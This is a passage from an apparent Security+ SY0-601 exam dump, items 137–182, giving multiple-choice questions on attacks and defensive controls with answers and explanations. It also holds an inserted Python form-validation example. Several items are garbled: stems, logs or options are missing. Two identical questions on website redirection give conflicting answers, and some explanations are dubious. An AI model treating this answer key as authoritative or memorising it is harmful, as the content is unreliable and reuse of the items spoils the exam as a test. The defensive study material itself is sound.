✑ Exploiting vulnerabilities in DNS protocols or implementations
✑ Sending malicious emails or links that trigger DNS queries with poisoned responses
According to CompTIA Security+ SY0-601 Exam Objectives 1.4 Given a scenario, analyze potential
indicators to determine the type of attack:
“DNS poisoning, also known as DNS spoofing or DNS cache poisoning, is a form of computer security
hacking in which corrupt Domain Name System (DNS) data is introduced into the DNS resolver’s cache,
causing the name server to return an incorrect result record.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cloudflare.com/learning/dns/dns-cache-poisoning/
137.The spread of misinformation surrounding the outbreak of a novel virus on election day led to
eligible voters choosing not to take the risk of going to the polls.
This is an example of:
A. prepending.
B. an influence campaign.
C. a watering-hole attack.
D. intimidation.
E. information elicitation.
Answer: B
Explanation:
This scenario describes an influence campaign, where false information is spread to influence or
manipulate people's beliefs or actions. In this case, the misinformation led eligible voters to avoid polling
places, which influenced the outcome of the election.
138.A grocery store is expressing security and reliability concerns regarding the on-site backup strategy
currently being performed by locally attached disks. The main concerns are the physical security of the
backup media and the durability of the data stored on these devices.
Which of the following is a cost-effective approach to address these concerns?
A. Enhance resiliency by adding a hardware RAID.
B. Move data to a tape library and store the tapes off-site
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution
Answer: D
Explanation:
A backup strategy is a plan that defines how to protect data from loss or corruption by creating and
storing copies of data on a different medium or location. A backup strategy should consider the security
and reliability of the backup data and the backup storage.
Based on these definitions, the most cost-effective approach to address the security and reliability
concerns regarding the on-site backup strategy would be D. Migrate to a cloud backup solution.
A cloud backup solution can provide several benefits, such as:
✑ Enhanced physical security of the backup data by storing it in a remote location that is protected by
multiple layers of security measures.
✑ Enhanced durability of the backup data by storing it on highly reliable storage devices that are
replicated across multiple availability zones or regions.
✑ Reduced costs of backup storage by paying only for the amount of data stored and transferred, and
by using features such as compression, deduplication, encryption, and lifecycle management.
✑ Increased flexibility and scalability of backup storage by choosing from various storage classes and
tiers that match the performance and availability requirements of the backup data.
139.A dynamic application vulnerability scan identified code injection could be performed using a web
form.
Which of the following will be BEST remediation to prevent this vulnerability?
A. Implement input validations
B. Deploy MFA
C. Utilize a WAF
D. Configure HIPS
Answer: A
Explanation:
Implementing input validations will prevent code injection attacks by verifying the type and format of user
input. References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 8
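An added example (not from the Dumpsbase material or the CompTIA study guide) of the "verify type and format" remediation this explanation describes: every field of a web form is checked against an allow-list of exactly what it may contain before the value is used. The form field names, their rules and the sample submissions are assumptions constructed for the demonstration:

```python
import re

# Constructed rules for a hypothetical order form: an allow-list of the exact
# type and shape each field may take. The field names are assumptions.
FIELD_RULES = {
    "username": {"type": str, "pattern": re.compile(r"[A-Za-z0-9_.-]{3,32}")},
    "quantity": {"type": int, "min": 1, "max": 999},
    "coupon":   {"type": str, "pattern": re.compile(r"[A-Z0-9]{4,10}"), "optional": True},
}


class ValidationError(ValueError):
    def __init__(self, field: str, reason: str):
        super().__init__(f"{field}: {reason}")
        self.field = field
        self.reason = reason


def validate_field(name: str, raw) -> object:
    rule = FIELD_RULES[name]
    if not isinstance(raw, str):
        raise ValidationError(name, "must be a string")
    if rule["type"] is int:
        # Only plain decimal digits count; "12; import os" or "0x1f" are rejected here,
        # before any conversion or use of the value.
        if not re.fullmatch(r"[0-9]{1,6}", raw):
            raise ValidationError(name, "must be a whole number")
        value = int(raw)
        if not rule["min"] <= value <= rule["max"]:
            raise ValidationError(name, f"must be between {rule['min']} and {rule['max']}")
        return value
    # String fields: fullmatch against the allow-list pattern, so quotes, braces,
    # semicolons and newlines are rejected rather than escaped after the fact.
    if not rule["pattern"].fullmatch(raw):
        raise ValidationError(name, "contains characters outside the allowed set")
    return raw


def validate_form(form: dict) -> dict:
    """Return a dict of typed, validated values or raise ValidationError."""
    unexpected = sorted(set(form) - set(FIELD_RULES))
    if unexpected:
        raise ValidationError(unexpected[0], "unexpected field")
    cleaned = {}
    for name, rule in FIELD_RULES.items():
        if name not in form:
            if rule.get("optional"):
                continue
            raise ValidationError(name, "required")
        cleaned[name] = validate_field(name, form[name])
    return cleaned


def rejection_reason(form: dict):
    """Helper for callers that prefer a message to an exception; None means valid."""
    try:
        validate_form(form)
    except ValidationError as exc:
        return str(exc)
    return None
```

The validator rejects unknown fields as well as malformed values, so a form cannot smuggle in parameters the application never expected; the options the question lists as less suitable (MFA, a WAF, HIPS) sit around the application, whereas this check sits inside it, where the vulnerable form handler runs.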
140.A user reports trouble using a corporate laptop. The laptop freezes and responds slowly when
writing documents, and the mouse pointer occasionally disappears.
The task list shows the following results
141.An application owner reports suspicious activity on an internal financial application from various
internal users within the past 14 days.
A security analyst notices the following:
• Financial transactions were occurring during irregular time frames and outside of business hours by
unauthorized users.
• Internal users in question were changing their passwords frequently during that time period.
• A jump box that several domain administrator users use to connect to remote devices was recently
compromised.
• The authentication method used in the environment is NTLM.
Which of the following types of attacks is MOST likely being used to gain unauthorized access?
A. Pass-the-hash
B. Brute-force
C. Directory traversal
D. Replay
Answer: A
Explanation:
The suspicious activity reported by the application owner, combined with the recent compromise of the
jump box and the use of NTLM authentication, suggests that an attacker is likely using a pass-the-hash
attack to gain unauthorized access to the financial application. This type of attack involves stealing
hashed passwords from memory and then using them to authenticate as the compromised user without
needing to know the user's plaintext password.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 5
142.Which of the following roles would MOST likely have direct access to the senior management team?
A. Data custodian
B. Data owner
C. Data protection officer
D. Data controller
Answer: C
Explanation:
A data protection officer (DPO) is a role that oversees the data protection strategy and compliance of an
organization. A DPO is responsible for ensuring that the organization follows data protection laws and
regulations, such as the General Data Protection Regulation (GDPR), and protects the privacy rights of
data subjects. A DPO also acts as a liaison between the organization and data protection authorities, as
well as data subjects and other stakeholders.
A DPO would most likely have direct access to the senior management team, as they need to report on
data protection issues, risks, and incidents, and advise on data protection policies and practices.
The other options are not correct because:
✑ A. Data custodian is a role that implements and maintains the technical controls and procedures for
data security and integrity. A data custodian does not have direct access to the senior management
team, as they are more involved in operational tasks than strategic decisions.
✑ B. Data owner is a role that determines the classification and usage of data within an organization. A
data owner does not have direct access to the senior management team, as they are more involved in
business functions than data protection compliance.
✑ D. Data controller is a role that determines the purposes and means of processing personal data
within an organization. A data controller does not have direct access to the senior management team, as
they are more involved in data processing activities than data protection oversight.
According to CompTIA Security+ SY0-601 Exam Objectives 2.3 Given a scenario, implement secure
protocols:
“A data protection officer (DPO) is a role that oversees the data protection strategy and compliance of an
organization.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://gdpr-info.eu/issues/data-protection-officer/
143.A security researcher is tracking an adversary by noting its attacks and techniques based
on its capabilities, infrastructure, and victims.
Which of the following is the researcher MOST likely using?
A. The Diamond Model of Intrusion Analysis
B. The Cyber Kill Chain
C. The MITRE CVE database
D. The incident response process
Answer: A
Explanation:
The Diamond Model is a framework for analyzing cyber threats that focuses on four key elements:
adversary, capability, infrastructure, and victim. By analyzing these elements, security researchers can
gain a better understanding of the threat landscape and develop more effective security strategies.
144.Remote workers in an organization use company-provided laptops with locally installed applications
and locally stored data Users can store data on a remote server using an encrypted connection. The
organization discovered data stored on a laptop had been made available to the public.
Which of the following security solutions would mitigate the risk of future data disclosures?
A. FDE
B. TPM
C. HIDS
D. VPN
Answer: A
Explanation:
Full-disk encryption (FDE) is the best security solution to mitigate the risk of future data disclosures
from a laptop. FDE would prevent unauthorized access to the data stored on the laptop even if it is stolen
or lost. FDE can also use a TPM to store the encryption key and ensure that only trusted software can
decrypt the data. HIDS and VPN are not directly related to data encryption, but they can provide
additional security benefits by detecting intrusions and protecting network traffic, respectively.
145.An analyst is working on an email security incident in which the target opened an attachment
containing a worm. The analyst wants to implement mitigation techniques to prevent further spread.
Which of the following is the BEST course of action for the analyst to take?
A. Apply a DLP solution.
B. Implement network segmentation
C. Utilize email content filtering.
D. Isolate the infected attachment.
Answer: B
Explanation:
Network segmentation is the BEST course of action for the analyst to take to prevent further spread of
the worm. Network segmentation helps to divide a network into smaller segments, isolating the infected
attachment from the rest of the network. This helps to prevent the worm from spreading to other devices
within the network. Implementing email content filtering or DLP solution might help in preventing the
email from reaching the target or identifying the worm, respectively, but will not stop the spread of the
worm.
References: CompTIA Security+ Study Guide, Chapter 5: Securing Network Infrastructure, 5.2
Implement Network Segmentation, pp. 286-289
146.Which of the following is a physical security control that ensures only the authorized user is present
when gaining access to a secured area?
A. A biometric scanner
B. A smart card reader
C. A PKI token
D. A PIN pad
Answer: A
Explanation:
A biometric scanner uses physical characteristics such as fingerprints to identify an individual user. It is
used to ensure that only the authorized user is present when gaining access to a secured area.
147.During an incident, a company's CIRT determines it is necessary to observe the continued network-
based transactions between a callback domain and the malware running on an enterprise PC.
Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral
spread and the risk that the adversary would notice any changes?
A. Physically move the PC to a separate Internet point of presence.
B. Create and apply microsegmentation rules.
C. Emulate the malware in a heavily monitored DMZ segment
D. Apply network blacklisting rules for the adversary domain
Answer: C
Explanation:
Emulating the malware in a heavily monitored DMZ segment is the best option for observing network-
based transactions between a callback domain and the malware running on an enterprise PC. This
approach provides an isolated environment for the malware to run, reducing the risk of lateral spread
and detection by the adversary. Additionally, the DMZ can be monitored closely to gather intelligence on
the adversary's tactics and techniques. References: CompTIA Security+ Study Guide, page 129
148.A security analyst wants to verify that a client-server (non-web) application is sending encrypted
traffic.
Which of the following should the analyst use?
A. openssl
B. hping
C. netcat
D. tcpdump
Answer: A
Explanation:
To verify that a client-server (non-web) application is sending encrypted traffic, a security analyst can use
OpenSSL. OpenSSL is a software library that provides cryptographic functions, including encryption and
decryption, in support of various security protocols, including SSL/TLS. It can be used to check whether
a client-server application is using encryption to protect traffic.
References: ✑ CompTIA Security+ Certification Exam Objectives - Exam SY0-601
149.A security analyst has been tasked with creating a new WiFi network for the company.
The requirements received by the analyst are as follows:
• Must be able to differentiate between users connected to WiFi
• The encryption keys need to change routinely without interrupting the users or forcing reauthentication
• Must be able to integrate with RADIUS
• Must not have any open SSIDs
Which of the following options BEST accommodates these requirements?
A. WPA2-Enterprise
B. WPA3-PSK
C. 802.11n
D. WPS
Answer: A
Explanation:
WPA2-Enterprise can accommodate all of the requirements listed. WPA2-Enterprise uses 802.1X
authentication to differentiate between users, supports the use of RADIUS for authentication, and allows
for the use of dynamic encryption keys that can be changed without disrupting the users or requiring
reauthentication. Additionally, WPA2-Enterprise does not allow for open SSIDs.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 7: Securing Networks, p. 317
150.An employee received multiple messages on a mobile device. The messages instruct the
employee to pair the device to an unknown device.
Which of the following BEST describes what a malicious person might be doing to cause this issue to
occur?
A. Jamming
B. Bluesnarfing
C. Evil twin
D. Rogue access point
Answer: B
Explanation:
Bluesnarfing is a hacking technique that exploits Bluetooth connections to snatch data from a wireless
device. An attacker can perform bluesnarfing when the Bluetooth function is on and your device is
discoverable by other devices within range. In some cases, attackers can even make calls from their
victim’s phone.
151.Certain users are reporting their accounts are being used to send unauthorized emails and conduct
suspicious activities.
After further investigation, a security analyst notices the following:
• All users share workstations throughout the day.
• Endpoint protection was disabled on several workstations throughout the network.
• Travel times on logins from the affected users are impossible.
• Sensitive data is being uploaded to external sites.
• All user account passwords were forced to be reset and the issue continued.
Which of the following attacks is being used to compromise the user accounts?
A. Brute-force
B. Keylogger
C. Dictionary
D. Rainbow
Answer: B
Explanation:
The symptoms suggest a keylogger is being used to compromise the user accounts, allowing the
attackers to obtain the users' passwords and other sensitive information.
References: ✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 6
152.Which of the following authentication methods sends out a unique password to be used within a
specific number of seconds?
A. TOTP
B. Biometrics
C. Kerberos
D. LDAP
Answer: A
Explanation:
Time-based One-Time Password (TOTP) is a type of authentication method that sends out a unique
password to be used within a specific number of seconds. It uses a combination of a shared secret key
and the current time to generate a one-time password. TOTP is commonly used for two-factor
authentication (2FA) to provide an additional layer of security beyond just a username and password.
153.A security analyst is reviewing the vulnerability scan report for a web server following an incident.
The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and
a patch is available for the vulnerability.
Which of the following is the MOST likely cause?
A. Security patches were uninstalled due to user impact.
B. An adversary altered the vulnerability scan reports
C. A zero-day vulnerability was used to exploit the web server
D. The scan reported a false negative for the vulnerability
Answer: A
Explanation:
A security patch is a software update that fixes a vulnerability or bug that could be exploited by attackers.
Security patches are essential for maintaining the security and functionality of systems and applications.
If the vulnerability that was used to exploit the server is present in historical vulnerability scan reports,
and a patch is available for the vulnerability, it means that the patch was either not applied or was
uninstalled at some point. A possible reason for uninstalling a security patch could be user impact, such
as performance degradation, compatibility issues, or functionality loss.
The other options are not correct because:
✑ B. An adversary altered the vulnerability scan reports. This could be a possibility, but it is less likely
than option A. An adversary would need to have access to the vulnerability scan reports and be able to
modify them without being detected.
Moreover, altering the reports would not prevent the patch from being applied or uninstalled.
✑ C. A zero-day vulnerability was used to exploit the web server. This is not correct because a zero-day
vulnerability is a vulnerability that is unknown to the public or the vendor, and therefore has no patch
available. The question states that a patch is available for the vulnerability that was used to exploit the
server.
✑ D. The scan reported a false negative for the vulnerability. This is not correct because a false negative
is when a scan fails to detect a vulnerability that is present. The question states that the vulnerability is
present in historical vulnerability scan reports, which means that it was detected by previous scans.
According to CompTIA Security+ SY0-601 Exam Objectives 1.4 Given a scenario, analyze potential
indicators to determine the type of attack:
“A security patch is a software update that fixes a vulnerability or bug that could be exploited by
attackers.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.getastra.com/blog/security-audit/vulnerability-scanning-report/
154.A company is concerned about individuals driving a car into the building to gain access.
Which of the following security controls would work BEST to prevent this from happening?
A. Bollard
B. Camera
C. Alarms
D. Signage
E. Access control vestibule
Answer: A
Explanation:
A bollard would work best to prevent individuals from driving a car into the building. A bollard is a short,
vertical post that can be used to block vehicles from entering a designated area. It is specifically
designed to stop cars from crashing into buildings or other structures.
155.Developers are writing code and merging it into shared repositories several times a day, where it is
tested automatically.
Which of the following concepts does this BEST represent?
A. Functional testing
B. Stored procedures
C. Elasticity
D. Continuous integration
Answer: D
Explanation:
Continuous integration is a software development practice where developers merge their code into a
shared repository several times a day, and the code is tested automatically. This ensures that code
changes are tested and integrated continuously, reducing the risk of errors and conflicts.
156.A security architect is implementing a new email architecture for a company. Due to security
concerns, the Chief Information Security Officer would like the new architecture to support email
encryption, as well as provide for digital signatures.
Which of the following should the architect implement?
A. POP
B. IMAP
C. HTTPS
D. S/MIME
Answer: D
Explanation:
S/MIME (Secure/Multipurpose Internet Mail Extensions) is a protocol that enables secure email
messages to be sent and received. It provides email encryption, as well as digital signatures, which can
be used to verify the authenticity of the sender. S/MIME can be used with a variety of email protocols,
including POP and IMAP.
References:
✑ https://www.comptia.org/content/guides/what-is-smime
✑ CompTIA Security+ Study Guide, Sixth Edition (SY0-601), page 139
157.A security analyst notices several attacks are being blocked by the NIPS but does not see anything
on the boundary firewall logs. The attack seems to have been thwarted.
Which of the following resiliency techniques was applied to the network to prevent this attack?
A. NIC Teaming
B. Port mirroring
C. Defense in depth
D. High availability
E. Geographic dispersal
Answer: C
Explanation:
Defense in depth is a resiliency technique that involves implementing multiple layers of security controls
to protect against different types of threats. In this scenario, the NIPS likely provided protection at a
different layer than the boundary firewall, demonstrating the effectiveness of defense in depth.
References: CompTIA Security+ Certification Exam Objectives (SY0-601)
159.Which of the following would MOST likely be identified by a credentialed scan but would be missed
by an uncredentialed scan?
A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.
Answer: D
Explanation:
An uncredentialed scan would miss missing patches for third-party software on Windows workstations
and servers. A credentialed scan, however, can scan the registry and file system to determine the patch
level of third-party applications. References: CompTIA Security+ Study Guide by Emmett Dulaney,
160.Which of the following in a forensic investigation should be priorities based on the order of volatility?
(Select TWO).
A. Page files
B. Event logs
C. RAM
D. Cache
E. Stored files
F. HDD
Answer: C,D
Explanation:
In a forensic investigation, volatile data should be collected first, based on the order of volatility. RAM
and Cache are examples of volatile data. References: CompTIA Security+ Study Guide 601, Chapter 11
161.A company recently experienced an attack during which its main website was directed to the
attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers.
Which of the following should the company implement to prevent this type of attack from occurring In the
future?
A. IPsec
B. SSL/TLS
C. DNSSEC
D. S/MIME
Answer: B
Explanation:
To prevent attacks where the main website is directed to the attacker's web server, allowing the
attacker to harvest credentials from unsuspecting customers, the company should implement SSL/TLS
(Secure Sockets Layer/Transport Layer Security) to encrypt the communication between the web server
and the clients. This will prevent attackers from intercepting and tampering with the communication, and
will also help to verify the identity of the web server to the clients.
162.A company recently experienced an attack during which its main website was directed to the
attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers.
Which of the following should the company implement to prevent this type of attack from occurring in the
future?
A. IPSec
B. SSL/TLS
C. DNSSEC
D. S/MIME
Answer: C
Explanation:
The attack described in the question is known as a DNS hijacking attack. In this type of attack, an
attacker modifies the DNS records of a domain name to redirect traffic to their own server. This allows
them to intercept traffic and steal sensitive information such as user credentials.
To prevent this type of attack from occurring in the future, the company should implement C. DNSSEC.
DNSSEC (Domain Name System Security Extensions) is a security protocol that adds digital signatures
to DNS records. This ensures that DNS records are not modified during transit and prevents DNS
hijacking attacks.
163.A security analyst is responding to an alert from the SIEM. The alert states that malware was
discovered on a host and was not automatically deleted.
Which of the following would be BEST for the analyst to perform?
A. Add a deny-all rule to that host in the network ACL
B. Implement a network-wide scan for other instances of the malware.
C. Quarantine the host from other parts of the network
D. Revoke the client's network access certificates
Answer: C
Explanation:
When malware is discovered on a host, the best course of action is to quarantine the host from other
parts of the network. This prevents the malware from spreading and potentially infecting other hosts.
Adding a deny-all rule to the host in the network ACL may prevent legitimate traffic from being
processed, implementing a network-wide scan is time-consuming and may not be necessary, and
revoking the client's network access certificates is an extreme measure that may not be warranted.
References: CompTIA Security+ Study Guide, pages 113-114
164.A company recently decided to allow its employees to use their personally owned devices for tasks
like checking email and messaging via mobile applications. The company would like to use MDM, but
employees are concerned about the loss of personal data.
Which of the following should the IT department implement to BEST protect the company against
company data loss while still addressing the employees’ concerns?
A. Enable the remote-wiping option in the MDM software in case the phone is stolen.
B. Configure the MDM software to enforce the use of PINs to access the phone.
C. Configure MDM for FDE without enabling the lock screen.
D. Perform a factory reset on the phone before installing the company's applications.
Answer: C
Explanation:
MDM software is a type of remote asset-management software that runs from a central server. It is used
by businesses to optimize the functionality and security of their mobile devices, including smartphones
and tablets. It can monitor and regulate both corporate-owned and personally owned devices according
to the organization's policies.
FDE stands for full disk encryption, which is a method of encrypting all data on a device’s storage. FDE
can protect data from unauthorized access in case the device is lost or stolen.
If a company decides to allow its employees to use their personally owned devices for work tasks, it
should configure MDM software to enforce FDE on those devices. This way, the company can protect its
data from being exposed if the device falls into the wrong hands. However, employees may be
concerned about the loss of personal data if the company also enables the remote-wiping option in the
MDM software. Remote wiping is a feature that allows the company to erase all data on a device
remotely in case of theft or loss. Remote wiping can also affect personal data on the device, which may
165.A customer has reported that an organization's website displayed an image of a smiley face rather
than the expected web page for a short time two days earlier.
A security analyst reviews log entries and sees the following around the time of the incident:
Explanation:
The log entry shows the IP address for "www.example.com" being changed to a different IP address,
which is likely the result of DNS poisoning. DNS poisoning occurs when an attacker is able to change the
IP address associated with a domain name in a DNS server's cache, causing clients to connect to the
attacker's server instead of the legitimate server. References: CompTIA Security+ SY0-601 Exam
Objectives: 3.2 Given a scenario, implement secure network architecture concepts.
166.A security administrator is setting up a SIEM to help monitor for notable events across the
enterprise.
Which of the following control types does this BEST represent?
A. Preventive
B. Compensating
C. Corrective
D. Detective
Answer: D
Explanation:
A SIEM is a security solution that helps detect security incidents by monitoring for notable events across
the enterprise. A detective control is a control that is designed to detect security incidents and respond to
them. Therefore, a SIEM represents a detective control.
Reference: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 3: Architecture and Design
167.During a security assessment, a security analyst finds a file with overly permissive permissions.
Which of the following tools will allow the analyst to reduce the permission for the existing users and
groups and remove the set-user-ID from the file?
A. ls
B. chflags
C. chmod
D. lsof
E. setuid
Answer: C
Explanation:
The chmod command is used to change the permissions of a file or directory. The analyst can use
chmod to reduce the permissions for existing users and groups and remove the set-user-ID bit from the
file. References: ✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 6
168.A Chief information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares.
Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
Explanation:
Data Loss Prevention (DLP) can help prevent employees from stealing data by monitoring and
controlling access to sensitive data. DLP can also detect and block attempts to transfer sensitive data
outside of the organization, such as via email, file transfer, or cloud storage.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 10: Managing Identity and
Access, p. 465
169.A security analyst is running a vulnerability scan to check for missing patches during a suspected
security incident. During which of the following phases of the response process is this activity MOST
likely occurring?
A. Containment
B. Identification
C. Recovery
D. Preparation
Answer: B
Explanation:
Vulnerability scanning is a proactive security measure used to identify vulnerabilities in the network and
systems. References: CompTIA Security+ Study Guide 601, Chapter 4
170.A junior security analyst is reviewing web server logs and identifies the following pattern in the log
file:
Which of the following types of attacks is being attempted and how can it be mitigated?
A. XSS; implement a SIEM
B. CSRF; implement an IPS
C. Directory traversal; implement a WAF
D. SQL injection; implement an IDS
Answer: C
Explanation:
The attack being attempted is directory traversal, which is a web application attack that allows an
attacker to access files and directories outside of the web root directory. A WAF can help mitigate this
attack by detecting and blocking attempts to access files outside of the web root directory.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 4: Securing Application
Development and Deployment, p. 191
171.A client sent several inquiries to a project manager about the delinquent delivery status of some
critical reports. The project manager claimed the reports were previously sent via email, but then quickly
generated and backdated the reports before submitting them as plain text within the body of a new email
message thread.
Which of the following actions MOST likely supports an investigation for fraudulent submission?
A. Establish chain of custody.
B. Inspect the file metadata.
C. Reference the data retention policy.
D. Review the email event logs
Answer: D
Explanation:
Reviewing the email event logs can support an investigation for fraudulent submission, as these logs can
provide details about the history of emails, including the message content, timestamps, and
sender/receiver information.
Reference: CompTIA Security+ Certification Exam Objectives, Exam SY0-601, 3.2 Given a scenario,
implement appropriate data security and privacy controls.
172.A security analyst reports a company policy violation in a case in which a large amount of sensitive
data is being downloaded after hours from various mobile devices to an external site. Upon further
investigation, the analyst notices that successful login attempts are being conducted with impossible
travel times during the same time periods when the unauthorized downloads are occurring. The analyst
also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP
configurations and an overlapping channel.
Which of the following attacks is being conducted?
A. Evil twin
B. Jamming
C. DNS poisoning
D. Bluesnarfing
E. DDoS
Answer: A
Explanation:
The attack being conducted is an Evil twin attack. An Evil twin attack involves creating a rogue wireless
access point (WAP) with the same Service Set Identifier (SSID) as a legitimate WAP to trick users into
connecting to it. Once connected, the attacker can intercept traffic or steal login credentials. The
successful login attempts with impossible travel times suggest that an attacker is using a stolen or
compromised credential to access the external site to which the sensitive data is being downloaded. The
non-standard DHCP configurations and overlapping channels of the WAPs suggest that the attacker is
using a rogue WAP to intercept traffic.
References: CompTIA Security+ Certification Exam Objectives, Exam Domain 1.0: Attacks, Threats, and
Vulnerabilities, 1.4 Compare and contrast types of attacks, p. 8
173.An organization is concerned about hackers potentially entering a facility and plugging in a remotely
accessible Kali Linux box.
Which of the following should be the first lines of defense against such an attack? (Select TWO)
A. MAC filtering
B. Zero trust segmentation
C. Network access control
D. Access control vestibules
E. Guards
F. Bollards
Answer: C,E
Explanation:
Network access control (NAC) is a technique that restricts access to a network based on the identity,
role, device, location, or other criteria of the users or devices. NAC can prevent unauthorized or
malicious devices from connecting to a network and accessing sensitive data or resources.
Guards are physical security personnel who monitor and control access to a facility. Guards can prevent
unauthorized or malicious individuals from entering a facility and plugging in a remotely accessible
device.
174.A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new
ERP system for the company. The CISO categorizes the system, selects the
controls that apply to the system, implements the controls, and then assesses the success of the
controls before authorizing the system.
Which of the following is the CISO using to evaluate the environment for this new ERP system?
A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framework
D. ISO 27002
Answer: C
Explanation:
The CISO is using the NIST Risk Management Framework (RMF) to evaluate the environment for the
new ERP system. The RMF is a structured process for managing risks that involves categorizing the
system, selecting controls, implementing controls, assessing controls, and authorizing the system.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 4: Risk
Management, pp. 188-191.
175.A third party asked a user to share a public key for secure communication.
Which of the following file formats should the user choose to share the key?
A. .pfx
B. .csr
C. .pvk
D. .cer
Answer: D
Explanation:
A user should choose the .cer file format to share a public key for secure communication. A .cer file is a
public key certificate that can be shared with third parties to enable secure communication.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 6:
Cryptography, pp. 301-302.
A public key is a cryptographic key that can be used to encrypt or verify data. A public key file is a file
that contains one or more public keys in a specific format.
There are different formats for public key files, depending on the application and the algorithm used.
Some of the common formats are:
✑ .pfx: This is a file format that stores a certificate and its private and public keys. It is also known as
PKCS#12 or Personal Information Exchange. It is used by some applications such as Microsoft Internet
Explorer and Outlook to import and export certificates and keys.
✑ .csr: This is a file format that stores a Certificate Signing Request, which is a message sent to a
Certificate Authority (CA) to request a digital certificate. It contains the public key and some information
about the identity of the requester. It is also known as PKCS#10 or Certification Request Syntax.
✑ .pvk: This is a file format that stores a private key for Microsoft Authenticode code signing. It is used
with a .spc file that contains the certificate and public key.
✑ .cer: This is a file format that stores a certificate, which is a document that binds a public key to an
identity. It is also known as DER or Distinguished Encoding Rules. It is used by some applications such
as OpenSSL and Java to read and write certificates.
176.Which of the following controls would be the MOST cost-effective and time-efficient to deter
intrusions at the perimeter of a restricted, remote military training area? (Select TWO).
A. Barricades
B. Thermal sensors
C. Drones
D. Signage
E. Motion sensors
F. Guards
G. Bollards
Answer: A,D
Explanation:
Barricades and signage are the most cost-effective and time-efficient controls to deter intrusions at the
perimeter of a restricted, remote military training area.
References: ✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 7
Which of the following controls would be BEST to use to prevent such a breach in the future?
A. Password history
B. Account expiration
C. Password complexity
D. Account lockout
Answer: C
Explanation:
To prevent such a breach in the future, the BEST control to use would be Password complexity.
Password complexity is a security measure that requires users to create strong passwords that are
difficult to guess or crack. It can help prevent unauthorized access to systems and data by making it
more difficult for attackers to guess or crack passwords.
The best control to use to prevent a breach like the one shown in the logs is password complexity.
Password complexity requires users to create passwords that are harder to guess, by including a mix of
upper and lowercase letters, numbers, and special characters. In the logs, the attacker was able to
guess the user's password using a dictionary attack, which means that the password was not complex
178.Hackers recently attacked a company's network and obtained several unfavorable pictures from the
Chief Executive Officer's workstation. The hackers are threatening to send the images to the press if a
ransom is not paid.
Which of the following is impacted the MOST?
A. Identity theft
B. Data loss
C. Data exfiltration
D. Reputation
Answer: D
Explanation:
The best option that describes what is impacted the most by the hackers’ attack and threat would be D.
Reputation. Reputation is the perception or opinion that others have about a person or an organization.
Reputation can affect the trust, credibility, and success of a person or an organization. In this scenario, if
the hackers send the unfavorable pictures to the press, it can damage the reputation of the Chief
Executive Officer and the company, and cause negative consequences such as loss of customers,
partners, investors, or employees.
179.A company is required to continue using legacy software to support a critical service.
Which of the following BEST explains a risk of this practice?
A. Default system configuration
B. Unsecure protocols
C. Lack of vendor support
D. Weak encryption
Answer: C
Explanation:
One of the risks of using legacy software is the lack of vendor support. This means that the vendor may
no longer provide security patches, software updates, or technical support for the software. This leaves
the software vulnerable to new security threats and vulnerabilities that could be exploited by attackers.
180.A Chief Information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares.
Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
Explanation:
The company should implement Data Loss Prevention (DLP) to prevent employees from stealing data
when accessing network shares.
References: ✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 8
181.An organization discovered a disgruntled employee exfiltrated a large amount of PII data by
uploading files.
Which of the following controls should the organization consider to mitigate this risk?
A. EDR
B. Firewall
C. HIPS
D. DLP
Answer: D
Explanation:
DLP stands for data loss prevention, which is a set of tools and processes that aim to prevent
unauthorized access, use, or transfer of sensitive data. DLP can help mitigate the risk of data exfiltration
by disgruntled employees or external attackers by monitoring and controlling data flows across
endpoints, networks, and cloud services. DLP can also detect and block attempts to copy, print, email,
upload, or download sensitive data based on predefined policies and rules.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.forcepoint.com/cyber-edu/data-loss-prevention-dlp
182.A retail company that is launching a new website to showcase the company's product line and
other information for online shoppers registered the following URLs:
* www.companysite.com
* shop.companysite.com
* about-us.companysite.com
* contact-us.companysite.com
* secure-logon.companysite.com
Which of the following should the company use to secure its website if the company is concerned with
convenience and cost?
A. A self-signed certificate
B. A root certificate
C. A code-signing certificate
D. A wildcard certificate
E. An extended validation certificate
Answer: D
Explanation:
The company can use a wildcard certificate to secure its website if it is concerned with convenience and
cost. A wildcard certificate can secure multiple subdomains, which makes it cost-effective and convenient
for securing the various registered domains.
The retail company should use a wildcard certificate if it is concerned with convenience and cost. A
wildcard SSL certificate is a single SSL/TLS certificate that can provide significant time and cost savings,
particularly for small businesses. The certificate includes a wildcard character (*) in the domain name
field, and can secure multiple subdomains of the primary domain.
